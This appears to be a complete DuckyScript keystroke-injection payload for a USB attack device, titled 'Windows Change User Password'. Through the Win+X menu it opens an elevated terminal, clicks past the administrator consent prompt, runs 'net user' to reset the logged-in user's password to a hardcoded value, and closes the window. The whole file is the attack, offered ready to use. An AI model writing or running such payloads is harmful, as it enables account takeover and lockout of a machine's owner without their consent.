REM ###########################################################
REM #                                                         |
REM # Title        : Windows Change User Password             |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Credentials, Exfiltrate                    |
REM # Target       : Windows                                    |
REM #                                                         |
REM ###########################################################

DEFINE NEW_PASSWORD uV6Nwn%K8WW$9jvd&M9TCSWOp1z#G$ESJFGOJtv%%&vk6$P2G^

DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER

DELAY 2000
STRING net user $env:USERNAME 
STRING NEW_PASSWORD
ENTER
DELAY 1000

ALT F4